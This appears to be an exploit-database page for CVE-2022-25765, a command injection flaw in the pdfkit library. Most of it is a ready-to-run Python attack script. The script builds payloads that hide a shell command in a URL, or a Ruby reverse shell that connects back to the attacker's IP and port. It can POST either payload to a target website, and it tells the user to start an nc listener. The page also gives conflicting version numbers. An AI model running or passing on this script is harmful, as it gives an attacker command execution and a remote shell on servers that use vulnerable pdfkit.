pdfkit Command Injection
pdfkit version 08.7.2 suffers from a command injection vulnerability.
#!/usr/bin/env python3# Exploit Title: pdfkit v0.8.7.2 - Command Injection# Date: 02/23/2023# Exploit Author: UNICORD (NicPWNs & Dev-Yeoj)# Vendor Homepage: https://pdfkit.org/# Software Link: https://github.com/pdfkit/pdfkit# Version: 0.0.0- Tested on: pdfkit 0.8.6# CVE: CVE-2022–25765# Source: https://github.com/UNICORDev/exploit-CVE-2022-25765# Description: The package pdfkit from 0.0.0 are vulnerable to Command Injection where the URL is not properly sanitized.# Importsimport timeimport sysimport requestsfrom urllib.parse import quoteclass color: red = '\033[91m' gold = '\033[93m' blue = '\033[36m' green = '\033[92m' no = '\033[0m'# Print UNICORD ASCII Artdef UNICORD_ASCII(): print(rf"""{color.red} _ __,~~~{color.gold}/{color.red}_{color.no} {color.blue}__ ___ _______________ ___ ___{color.no}{color.red} ,~~`( )_( )-\| {color.blue}/ / / / |/ / _/ ___/ __ \/ _ \/ _ \{color.no}{color.red} |/| `--. {color.blue}/ /_/ / // // /__/ /_/ / , _/ // /{color.no}{color.green}_V__v___{color.red}!{color.green}_{color.red}!{color.green}__{color.red}!{color.green}_____V____{color.blue}\____/_/|_/___/\___/\____/_/|_/____/{color.green}....{color.no} """)# Print exploit help menudef help(): print(r"""UNICORD Exploit for CVE-2022–25765 (pdfkit) - Command InjectionUsage: python3 exploit-CVE-2022–25765.py -c <command> python3 exploit-CVE-2022–25765.py -s <local-IP> <local-port> python3 exploit-CVE-2022–25765.py -c <command> [-w <http://target.com/index.html> -p <parameter>] python3 exploit-CVE-2022–25765.py -s <local-IP> <local-port> [-w <http://target.com/index.html> -p <parameter>] python3 exploit-CVE-2022–25765.py -hOptions: -c Custom command mode. Provide command to generate custom payload with. -s Reverse shell mode. Provide local IP and port to generate reverse shell payload with. -w URL of website running vulnerable pdfkit. (Optional) -p POST parameter on website running vulnerable pdfkit. (Optional) -h Show this help menu.""") exit()def loading(spins): def spinning_cursor(): while True: for cursor in '|/-\\': yield cursor spinner = spinning_cursor() for _ in range(spins): sys.stdout.write(next(spinner)) sys.stdout.flush() time.sleep(0.1) sys.stdout.write('\b')# Run the exploitdef exploit(payload, exploitMode, postArg): UNICORD_ASCII() print(f"{color.blue}UNICORD: {color.red}Exploit for CVE-2022–25765 (pdfkit) - Command Injection{color.no}") loading(15) print(f"{color.blue}OPTIONS: {color.gold}{modes[exploitMode]}{color.no}") print(f"{color.blue}PAYLOAD: {color.gold}" + payload + f"{color.no}") if "web" in exploitMode: if exploitMode == "webcommand": print( f"{color.blue}WARNING: {color.gold}Wrap custom command in \"quotes\" if it has spaces.{color.no}") else: print( f"{color.blue}LOCALIP: {color.gold}{listenIP}:{listenPort}{color.no}") print( f"{color.blue}WARNING: {color.gold}Be sure to start a local listener on the above IP and port. \"nc -lnvp {listenPort}\".{color.no}") print(f"{color.blue}WEBSITE: {color.gold}{website}{color.no}") print(f"{color.blue}POSTARG: {color.gold}{postArg}{color.no}") if "http" not in website: print( f"{color.blue}ERRORED: {color.red}Make sure website has schema! Like \"http://\".{color.no}") exit() postArg = postArg + "=" + quote(payload, safe="") try: response = requests.post(website, postArg) except: print( f"{color.blue}ERRORED: {color.red}Couldn't connect to website!{color.no}") exit() loading(15) print(f"{color.blue}EXPLOIT: {color.gold}Payload sent to website!{color.no}") loading(15) print(f"{color.blue}SUCCESS: {color.green}Exploit performed action.{color.no}") elif exploitMode == "command": print(f"{color.blue}WARNING: {color.gold}Wrap custom command in \"quotes\" if it has spaces.{color.no}") loading(15) print( f"{color.blue}EXPLOIT: {color.green}Copy the payload above into a PDFKit.new().to_pdf Ruby function or any application running vulnerable pdfkit.{color.no}") elif exploitMode == "shell": print(f"{color.blue}LOCALIP: {color.gold}{listenIP}:{listenPort}{color.no}") print(f"{color.blue}WARNING: {color.gold}Be sure to start a local listener on the above IP and port.{color.no}") loading(15) print( f"{color.blue}EXPLOIT: {color.green}Copy the payload above into a PDFKit.new().to_pdf Ruby function or any application running vulnerable pdfkit.{color.no}") exit()if __name__ == "__main__": args = ['-h', '-c', '-s', '-w', '-p'] modes = {'command': 'Custom Command Mode', 'shell': 'Reverse Shell Mode', 'webcommand': 'Custom Command Send to Target Website Mode', 'webshell': 'Reverse Shell Sent to Target Website Mode'} postArg = "url" if args[0] in sys.argv: help() elif args[1] in sys.argv and not args[2] in sys.argv: try: if sys.argv[sys.argv.index(args[1]) + 1] in args: raise command = sys.argv[sys.argv.index(args[1]) + 1] except: print( f"{color.blue}ERRORED: {color.red}Provide a custom command! \"-c <command>\"{color.no}") exit() payload = f"http://%20`{command}`" mode = "command" elif args[2] in sys.argv and not args[1] in sys.argv: try: if "-" in sys.argv[sys.argv.index(args[2]) + 1]: raise listenIP = sys.argv[sys.argv.index(args[2]) + 1] except: print( f"{color.blue}ERRORED: {color.red}Provide a target and port! \"-s <target-IP> <target-port>\"{color.no}") exit() try: if "-" in sys.argv[sys.argv.index(args[2]) + 2]: raise listenPort = sys.argv[sys.argv.index(args[2]) + 2] except: print( f"{color.blue}ERRORED: {color.red}Provide a target port! \"-t <target-IP> <target-port>\"{color.no}") exit() payload = f"http://%20`ruby -rsocket -e'spawn(\"sh\",[:in,:out,:err]=>TCPSocket.new(\"{str(listenIP)}\",\"{str(listenPort)}\"))'`" mode = "shell" else: help() if args[3] in sys.argv and args[4] in sys.argv: try: if "-" in sys.argv[sys.argv.index(args[3]) + 1] and len(sys.argv[sys.argv.index(args[3]) + 1]) == 2: raise website = sys.argv[sys.argv.index(args[3]) + 1] mode = "web" + mode except: print( f"{color.blue}ERRORED: {color.red}Provide a target site and post parameter! \"-w <http://target.com/index.html> -p <parameter>\"{color.no}") exit() try: if "-" in sys.argv[sys.argv.index(args[4]) + 1] and len(sys.argv[sys.argv.index(args[4]) + 1]) == 2: raise postArg = sys.argv[sys.argv.index(args[4]) + 1] except: print( f"{color.blue}ERRORED: {color.red}Provide a target site and post parameter! \"-w <http://target.com/index.html> -p <parameter>\"{color.no}") exit() elif args[3] in sys.argv or args[4] in sys.argv: print( f"{color.blue}ERRORED: {color.red}Provide a target site and post parameter! \"-w <http://target.com/index.html> -p <parameter>\"{color.no}") exit() exploit(payload, mode, postArg)
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The package pdfkit from version 0.0.0 through version 0.8.6 is vulnerable to Command Injection where the URL is not properly sanitized.
The package pdfkit from 0.0.0 are vulnerable to Command Injection where the URL is not properly sanitized.